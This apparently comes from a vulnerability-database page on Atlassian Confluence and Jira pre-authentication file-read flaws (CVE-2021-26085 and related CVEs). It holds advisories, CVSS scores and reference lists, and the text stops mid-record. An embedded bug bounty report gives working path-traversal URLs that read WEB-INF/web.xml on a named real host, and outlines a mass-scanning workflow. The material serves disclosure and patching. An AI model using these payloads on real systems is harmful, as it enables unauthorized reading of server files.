Description
Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.
This vulnerability was discovered by Amit Laish, GE Digital, Cyber Security Lab.
*Affected versions:*
* version < 7.4.10
* 7.5.0 ≤ version < 7.12.3
*Fixed versions:*
* 7.4.10
* 7.12.3
* 7.13.0
* 7.14.0
Affected Software
Related
{"id": "CONFSERVER-67893", "vendorId": null, "type": "atlassian", "bulletinFamily": "software", "title": "Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.\r\n\r\nThe affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\r\n\r\nThis vulnerability was discovered by\u00a0Amit Laish, GE Digital, Cyber Security Lab.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 7.4.10\r\n * 7.5.0 \u2264 version < 7.12.3\r\n\r\n*Fixed versions:*\r\n * 7.4.10\r\n * 7.12.3\r\n * 7.13.0\r\n * 7.14.0 \u00a0", "published": "2021-07-21T00:18:45", "modified": "2021-11-29T21:28:34", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://jira.atlassian.com/browse/CONFSERVER-67893", "reporter": "security-metrics-bot", "references": [], "cvelist": ["CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"], "immutableFields": [], "lastseen": "2022-01-05T06:44:34", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60469", "ATLASSIAN:CONFSERVER-67893", "ATLASSIAN:CWD-5685", "ATLASSIAN:JRASERVER-72695", "CONFSERVER-60469", "CWD-5685", "JRASERVER-72695"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-1063"]}, {"type": "cve", "idList": ["CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"]}, {"type": "dsquare", "idList": ["E-737"]}, {"type": "exploitdb", "idList": ["EDB-ID:50377", "EDB-ID:50380"]}, {"type": "githubexploit", "idList": ["7568F9C3-3A35-590E-90A2-866D5C8D59B2", "9413B7EF-463D-5026-9383-8878A2BD51D2", "B3FA9C79-AA38-5ADB-8E71-898783D49FB4"]}, {"type": "hackerone", "idList": ["H1:1369288"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ATLASSIAN-CONFLUENCE-CVE-2020-29448/"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-60469.NASL", "CONFLUENCE_CVE-2021-26085.NBIN", "WEB_APPLICATION_SCANNING_112860", "WEB_APPLICATION_SCANNING_112861", "WEB_APPLICATION_SCANNING_112862", "WEB_APPLICATION_SCANNING_112954", "WEB_APPLICATION_SCANNING_112955", "WEB_APPLICATION_SCANNING_112956", "WEB_APPLICATION_SCANNING_112965", "WEB_APPLICATION_SCANNING_112966"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164401", "PACKETSTORM:164405"]}, {"type": "seebug", "idList": ["SSV:99336"]}, {"type": "zdt", "idList": ["1337DAY-ID-36851", "1337DAY-ID-36852"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60469", "ATLASSIAN:CONFSERVER-67893", "ATLASSIAN:CWD-5685", "ATLASSIAN:JRASERVER-72695"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-1063"]}, {"type": "cve", "idList": ["CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"]}, {"type": "dsquare", "idList": ["E-737"]}, {"type": "exploitdb", "idList": ["EDB-ID:50377", "EDB-ID:50380"]}, {"type": "githubexploit", "idList": ["7568F9C3-3A35-590E-90A2-866D5C8D59B2", "9413B7EF-463D-5026-9383-8878A2BD51D2", "B3FA9C79-AA38-5ADB-8E71-898783D49FB4"]}, {"type": "hackerone", "idList": ["H1:1369288"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ATLASSIAN-CONFLUENCE-CVE-2020-29448/"]}, {"type": "nessus", "idList": ["CONFLUENCE_CVE-2021-26085.NBIN", "WEB_APPLICATION_SCANNING_112860", "WEB_APPLICATION_SCANNING_112861", "WEB_APPLICATION_SCANNING_112862"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164401", "PACKETSTORM:164405"]}, {"type": "seebug", "idList": ["SSV:99336"]}, {"type": "zdt", "idList": ["1337DAY-ID-36851", "1337DAY-ID-36852"]}]}, "exploitation": null, "vulnersScore": 6.1}, "affectedSoftware": [{"version": "7.6.3", "operator": "le", "name": "confluence server and data center"}, {"version": "7.9.0", "operator": "le", "name": "confluence server and data center"}, {"version": "7.8.3", "operator": "le", "name": "confluence server and data center"}, {"version": "7.10.0", "operator": "le", "name": "confluence server and data center"}, {"version": "7.10.1", "operator": "le", "name": "confluence server and data center"}, {"version": "7.13.0", "operator": "lt", "name": "confluence server and data center"}, {"version": "7.4.10", "operator": "lt", "name": "confluence server and data center"}, {"version": "7.12.3", "operator": "lt", "name": "confluence server and data center"}], "_state": {"dependencies": 1647589307, "score": 0}}
{"atlassian": [{"lastseen": "2021-11-29T22:44:51", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.\r\n\r\nThe affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\r\n\r\nThis vulnerability was discovered by\u00a0Amit Laish, GE Digital, Cyber Security Lab.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 7.4.10\r\n * 7.5.0 \u2264 version < 7.12.3\r\n\r\n*Fixed versions:*\r\n * 7.4.10\r\n * 7.12.3\r\n * 7.13.0\r\n * 7.14.0 \u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-07-21T00:18:45", "type": "atlassian", "title": "Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "CVE-2020-29448", "CVE-2021-26086"], "modified": "2021-11-29T21:28:34", "id": "ATLASSIAN:CONFSERVER-67893", "href": "https://jira.atlassian.com/browse/CONFSERVER-67893", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-05T06:45:01", "description": "The ConfluenceResourceDownloadRewriteRule class in Confluence Server and Confluence Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 6.13.18\r\n * 6.14.0 \u2264 version < 7.4.6\r\n * 7.5.0 \u2264 version < 7.8.3\r\n\r\n\r\nh4. Fixed versions:\r\n * 6.13.18\r\n * 7.4.6\r\n * 7.8.3\r\n * 7.9.0\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:03:08", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Confluence Server - CVE-2020-29448", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29448", "CVE-2020-36240", "CVE-2021-26085", "CVE-2021-26086"], "modified": "2021-10-11T12:29:47", "id": "CONFSERVER-60469", "href": "https://jira.atlassian.com/browse/CONFSERVER-60469", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-11T12:42:48", "description": "The ConfluenceResourceDownloadRewriteRule class in Confluence Server and Confluence Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 6.13.18\r\n * 6.14.0 \u2264 version < 7.4.6\r\n * 7.5.0 \u2264 version < 7.8.3\r\n\r\n\r\nh4. Fixed versions:\r\n * 6.13.18\r\n * 7.4.6\r\n * 7.8.3\r\n * 7.9.0\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-10T00:03:08", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Confluence Server - CVE-2020-29448", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36240", "CVE-2021-26085", "CVE-2020-29448", "CVE-2021-26086"], "modified": "2021-10-11T12:29:47", "id": "ATLASSIAN:CONFSERVER-60469", "href": "https://jira.atlassian.com/browse/CONFSERVER-60469", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-15T12:43:59", "description": "Affected versions of Atlassian Jira Server and Data Center\u00a0allow remote attackers to read particular files via a path traversal vulnerability in the\u00a0/WEB-INF/web.xml endpoint.\r\n\r\n\u00a0\r\n\r\nThe affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 8.5.14\r\n * 8.6.0 \u2264 version < 8.13.6\r\n * 8.14.0 \u2264 version < 8.16.1\r\n\r\n*Fixed versions:*\r\n * 8.5.14\r\n * 8.13.6\r\n * 8.16.1\r\n * 8.17.0 \u00a0\r\n\r\n\r\n\r\nh4. Mitigation\r\nUntil the upgrade you may use the following workaround to protect the files:\r\nhttps://confluence.atlassian.com/jirakb/workaround-for-cve-2019-15004-979416164.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-08-12T03:49:00", "type": "atlassian", "title": "Limited Remote File Read in Jira Software Server - CVE-2021-26086", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "CVE-2020-29448", "CVE-2021-26086", "CVE-2019-15004"], "modified": "2021-11-15T12:13:43", "id": "ATLASSIAN:JRASERVER-72695", "href": "https://jira.atlassian.com/browse/JRASERVER-72695", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-27T12:29:46", "description": "Affected versions of Atlassian Jira Server and Data Center\u00a0allow remote attackers to read particular files via a path traversal vulnerability in the\u00a0/WEB-INF/web.xml endpoint.\r\n\r\n\u00a0\r\n\r\nThe affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * version < 8.5.14\r\n * 8.6.0 \u2264 version < 8.13.6\r\n * 8.14.0 \u2264 version < 8.16.1\r\n\r\n*Fixed versions:*\r\n * 8.5.14\r\n * 8.13.6\r\n * 8.16.1\r\n * 8.17.0 \u00a0\r\n\r\n\r\n\r\nh4. Mitigation\r\nUntil the upgrade you may use the following workaround to protect the files:\r\nhttps://confluence.atlassian.com/jirakb/workaround-for-cve-2019-15004-979416164.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-12T03:49:00", "type": "atlassian", "title": "Limited Remote File Read in Jira Software Server - CVE-2021-26086", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14994", "CVE-2019-15004", "CVE-2020-29448", "CVE-2021-26085", "CVE-2021-26086"], "modified": "2022-01-27T09:57:48", "id": "JRASERVER-72695", "href": "https://jira.atlassian.com/browse/JRASERVER-72695", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T06:43:45", "description": "The ResourceDownloadRewriteRule class in Crowd before version 4.0.4, and from version 4.1.0 before 4.1.2 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 4.0.4\r\n * 4.10.0 \u2264 version < 4.1.2\r\n\r\nh4. Fixed versions:\r\n * 4.0.4\r\n * 4.1.2\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-02-16T18:29:42", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Crowd - CVE-2020-36240", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-36240", "CVE-2020-29448"], "modified": "2021-09-16T05:28:35", "id": "ATLASSIAN:CWD-5685", "href": "https://jira.atlassian.com/browse/CWD-5685", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-05T06:39:26", "description": "The ResourceDownloadRewriteRule class in Crowd before version 4.0.4, and from version 4.1.0 before 4.1.2 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.\r\n\r\nh3. Affected versions:\r\n * version < 4.0.4\r\n * 4.10.0 \u2264 version < 4.1.2\r\n\r\nh4. Fixed versions:\r\n * 4.0.4\r\n * 4.1.2\r\n\r\nThis vulnerability is attributed to Amit Laish, a security researcher from GE Digital.\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-02-16T18:29:42", "type": "atlassian", "title": "Pre-Authorization Limited Arbitrary File Read in Crowd - CVE-2020-36240", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29448", "CVE-2020-36240"], "modified": "2021-09-16T05:28:35", "id": "CWD-5685", "href": "https://jira.atlassian.com/browse/CWD-5685", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2021-11-26T17:55:41", "bounty": 0.0, "description": "These vulnerabilities were found with https://trickest.com https://trickest.io\n\nCVE-2021-26085:\n=====================\n>https://jira.mariadb.org:/s/123cfx/_/;/WEB-INF/web.xml\n\nCVE-2021-26086:\n=====================\n>https://jira.mariadb.org/s/cfx/_/;/WEB-INF/web.xml\n\nVideo explanation:\n---------------------\n\n### Node EOF-RAW-DATA:\n- Found Jira hosts from various bug bounty programs convert to file\n\n### Node SED-ADD-AT-BEGINNING:\n- Append https:// to every line\n\n### Node PASTE-JIRA-PATHS\n- Converts Jira paths to file\n\n### Node MEG(tool)\n- Requesting URLs and paths from the file\n\n### Node IS-IT-JIRA?\n- Checking if the requested URL is Jira\n\n### Node TAKE-JIRA-URLs\n- Parsing previous nodes to get raw URLs\n\n### Node CVE-2021-26086\n- Converts payloads to a file\n\n### Node CVE-2021-26085\n- Converts payloads to a file\n\n### Node RECURSIVELY-CAT-ALL\n- Converts payloads file into one\n\n### Node MEG (2)\n- Requesting URLs and paths from the file\n\n### Node VALIDATE CVE-2021-26086\n- Validates CVEs by searching for \"<web-app </web-app>\" in meg responses\n\n## Impact\n\nCVE-2021-26086 allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint\nCVE-2021-26085 allows remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-13T12:36:15", "type": "hackerone", "title": "MariaDB: Path Traversal CVE-2021-26086 CVE-2021-26085", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "CVE-2021-26086"], "modified": "2021-11-05T17:33:15", "id": "H1:1369288", "href": "https://hackerone.com/reports/1369288", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T17:23:18", "description": "The ConfluenceResourceDownloadRewriteRule class in Confluence Server and Confluence Data Center before version 6.13.18, from 6.14.0 before 7.4.6, and from 7.5.0 before 7.8.3 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-22T21:15:00", "type": "cve", "title": "CVE-2020-29448", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29448"], "modified": "2021-02-26T20:26:00", "cpe": [], "id": "CVE-2020-29448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29448", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-30T15:23:20", "description": "Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-16T01:15:00", "type": "cve", "title": "CVE-2021-26086", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086"], "modified": "2022-03-30T13:13:00", "cpe": [], "id": "CVE-2021-26086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26086", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-06-10T17:24:21", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-03T00:15:00", "type": "cve", "title": "CVE-2021-26085", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2022-06-10T14:25:00", "cpe": [], "id": "CVE-2021-26085", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26085", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2022-01-12T12:05:53", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x < 7.4.6 or 7.5.x < 7.8.3. It is, therefore, affected by an incorrect path access check vulnerability allowing unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-05T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.18 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112860", "href": 